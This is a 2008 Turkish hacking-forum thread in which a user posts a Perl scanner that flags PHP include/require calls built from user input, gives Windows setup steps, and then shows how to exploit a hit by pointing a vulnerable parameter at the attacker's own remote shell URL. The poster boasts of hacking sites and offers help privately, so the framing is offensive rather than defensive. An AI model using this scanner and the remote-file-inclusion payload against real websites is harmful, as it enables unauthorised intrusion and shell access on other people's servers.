DaNGeR HaCK Team

Söz konusu vatan ise,gerisi teferruattır.
 
AnasayfaKapıGaleriKayıt OlGiriş yap
Arama
 
 

Sonuç :
 
Rechercher çıkıntı araştırma
En son konular
» BİLEŞİM
Perş. Ocak 02, 2014 7:41 pm tarafından sempatikhackerHYLT

» Selam Arkadaşlar
Salı Haz. 18, 2013 6:23 pm tarafından piergüven

» if you want to do help , come in
Ptsi Mart 25, 2013 8:06 pm tarafından Championn

» ben qeldim
Paz Mart 03, 2013 3:27 pm tarafından DamnRussians

» Acemioğlan geldi
Çarş. Şub. 27, 2013 12:25 am tarafından derbedercx

» Hack Dersi
Paz Şub. 10, 2013 12:08 am tarafından geuqhan

» face şifresi çalmam lazım
C.tesi Şub. 09, 2013 11:54 pm tarafından geuqhan

» TEK TUŞLA SİTE ÇÖKERT
C.tesi Şub. 09, 2013 12:44 pm tarafından besnile

» buyrun size pc hack
Ptsi Ara. 03, 2012 12:22 am tarafından Melankollia

Tarıyıcı
 Kapı
 Indeks
 Üye Listesi
 Profil
 SSS
 Arama
Forum
Ortaklar
Tarıyıcı
 Kapı
 Indeks
 Üye Listesi
 Profil
 SSS
 Arama
Forum
Ortaklar
Giriş yap
Kullanıcı Adı:
Şifre:
Beni hatırla: 
:: Şifremi unuttum

Paylaş | 
 

 Perl'de RFI Taraması

Önceki başlık Sonraki başlık Aşağa gitmek 
YazarMesaj
XabrkX
Pro Hacker
Pro Hacker
avatar

Mesaj Sayısı : 20
Yaş : 25
Nerden : NİYE BİZEMİ GELECEN?:d:s
Lakap : ******kaRİZma*******
Kayıt tarihi : 12/08/08

MesajKonu: Perl'de RFI Taraması   Salı Eyl. 02, 2008 6:22 pm

s.a beyler XabrkX farkıyla şimdi sizlere php scriptlerde nasıl kolayca ve hızlı bir şekilde RFI açığı tarayacağınızı anlatıcam...

Bunun için ilk önce Active Perl bilgisayarınızda kurulu olması gerekli!

|| Active Perl Download ||

http://downloads.activestate.com/ActivePerl/Windows/5.6/ActivePerl-5.6.1.635-MSWin32-x86.zip


Programı C: ye kurdunuz varsayalım...Altta verdiğim kodları;

Kod:
#!/usr/bin/perl -w

#
# Remote File Inclusion scanner created by S_e_YM_e_N
# This will check a directory (& subdirectories) for php scripts, containing an inclusion.
# New in version 2: Code improved, you can set the amount of subdirs to scan, results considered critical displayed in red,
# comments containing inclusion code displayed in grey, all errors filtered out, result file looks way nicer ^_^
#



$subdirstoscan = 20;
$resultfile = "results.html"; #Dont forget to add .htm or .html

if(-e "$resultfile"){
unlink("$resultfile");
}
open(DAT,">>$resultfile") || die("Cannot Open File");
print DAT "<html><head><title>Iron's Remote File Inclusion Scanner -> Results</title></head><body><table border=1><td><b>WHERE</b></td><td><b>Code</b></td><tr>";
close(DAT);




print "Directory to read? ";
$input = <stdin>;
chop ($input);
$dir = "/*";
$deep = 0;
while($deep != $subdirstoscan){
@files = <$input$dir>;

foreach $file (@files) {
if(-f $file){
print "Checking: " .$file . "\n";
open(MYINPUTFILE, "$file");
while(<MYINPUTFILE>)
 {

 my($line) = $_;

 chomp($line);
if(($line =~ m/include_once \$/i) || ($line =~ m/require_once \$/i) || ($line =~ m/include_once\(\$/i) || ($line =~ m/require_once\(\$/i) || ($line =~ m/require \$/i) || ($line =~ m/require\(\$/i) ||  ($line =~ m/require \$/i) || ($line =~ m/include \$/i) || ($line =~ m/include\(\$/i))
{
if(($line =~ /\$_GET/) || ($line =~ /\$_POST/) || ($line =~ /\$_REQUEST/)){ #This could be critical

open(DAT,">>$resultfile") || die("Cannot Open File");
print DAT "<td>$file</td><td><b><font color=red>$line</b></font></td><tr>";
close(DAT);
} elsif($line =~ /^\/\//){ #This is just a comment, but display it anyway :-)
open(DAT,">>$resultfile") || die("Cannot Open File");
print DAT "<td>$file</td><td><font color=grey>$line</font></td><tr>";
close(DAT);
}
else {
open(DAT,">>$resultfile") || die("Cannot Open File");
print DAT "<td>$file</td><td>$line</td><tr>";
close(DAT);
}
}
 }
 }
}
$deep++;
$dir .= "/*";
}
open(DAT,">>$resultfile") || die("Cannot Open File");
print DAT "</table><br><center>&copy;Ironfist</center></body></html>";
close(DAT);
print "Done! Check $resultfile for the found inclusions!";



C:\Perl\bin klasörünün içine giderek bir not defterine yapıştırıyoruz ve Dosya > Farklı Kaydet deyip inc.pl olarak kaydediyoruz şimdi bin klasörü içinde inc.pl adlı perl dosyası oluşturduk...Eğer şu şekilde bir dosya oluşturabildiyseniz doğru gidiyorsunuz demektir:



Evet inc.pl yi çalıştıralım sırasıyla şunları yapıyoruz Başlat > Çalıştır > CMD > Enter karşınıza dos ekranı geldi

C:\Documents and Settings\SerdarPasa>cd../.. bu komutu verdiğiniz zaman C:\> bu dizine geçeceksiniz sırasıyla şu komutları verin C:\> dizinindeyken cd perl komutunu verin ardından cd bin ve bin klasörüne girin yani:



daha sonra C:\Perl\bin>inc.pl komutunu verin...



inc.pl yi çalıştırdığınızda size "Directory to read?" yani hangi dosyayı taramamı istersin diye soruyor siz internetten indirdiğiniz php script dosyasını klasör halinde bin klasörüne atın dosyanın tam adını kopyalayıp Directory to read? 'in karşısına yapıştırın...

Yani:



gördüğünüz gibi taratacağım script dosyası inc.pl dosyasıyla aynı yerde yani C:\Perl\bin klasörüne attım.Taratacağım scriptin adını tam olarak kopyalıyorum dikkat edin eksiksiz olmalı! Şu şekilde yapıştırıyoruz:



ve enter'a basıyoruz inc.pl seri bir şekilde klasörün içindeki bütün php dosyalarında RFI açığı bulmada kullanılan include,require,include_once,require_once gibi parametleri saptıyor ve bunları Results adlı bir html dosyası oluşturarak içinde düzgün bir şekilde tablolar yardımıyla bize sunuyor

inc.pl dosyaları tarama işlemini bitirince size şu şekilde bir mesaj verecek:

"Done! Check results.html for the found inclusions!"

Yani; işlem bitti results.html dosyasını sonuçları görmek için kontrol edin diyor...



C:\Perl\bin dizine tekrar gidiyoruz ve results adlı bir html sayfası olucak sonuçlar onun içinde o dosyayı açıyoruz...

Açıkların nasıl göründüğüne bakmak istiyorsanız BURAYA TIKLAYIN!

Peki çıkan açıkları nasıl kullanırız? Örneğin:

Code:

/flashbb/phpbb/sendmsg.php include($phpbb_root_path . 'includes/functions_post.'.$phpEx)

biz bunu şu şekilde derleriz:

http://www.siteadresi.com/flashbb/phpbb/sendmsg.php?php_root_path=SHELL ADRESİNİZ

Bu kadar sizlerekolay gelsin artık kendi RFI açıklarınızı kolay bir şekilde bulabilirsiniz...

Saygılarımla!





Not:KENDİ YAZIMDIR BAZI BÖLÜMLER ALINTIDIR
VE HACKLEDİĞİM SİTLERİ GÖSTERİRİM AMA SİTEMİN İNDEXİNDE KENDİ SİTEM OLDUĞU İÇİN REKLMA OLUR DİYE VERMİYORUM YAPMAYINLAR ÖZELMESAH ATISNLAR....HER TÜRLÜ KONUDA YARDIMCI OLURUM...
Sayfa başına dön Aşağa gitmek
Kullanıcı profilini gör http://www.pckopat.forumn.biz
scorpion
Administratoravatar

Mesaj Sayısı : 68
Yaş : 29
Nerden : sakarya
Ruh Hali :
Sanal Hayvan :
Kayıt tarihi : 18/07/08

MesajKonu: Geri: Perl'de RFI Taraması   Ptsi Ekim 06, 2008 8:28 pm

paylaşım için teşk.
Sayfa başına dön Aşağa gitmek
Kullanıcı profilini gör
 
Perl'de RFI Taraması
Önceki başlık Sonraki başlık Sayfa başına dön 
1 sayfadaki 1 sayfası

Bu forumun müsaadesi var:Bu forumdaki mesajlara cevap veremezsiniz
DaNGeR HaCK Team :: Web Hack :: web hack hakkında genel bilgi-
Buraya geçin: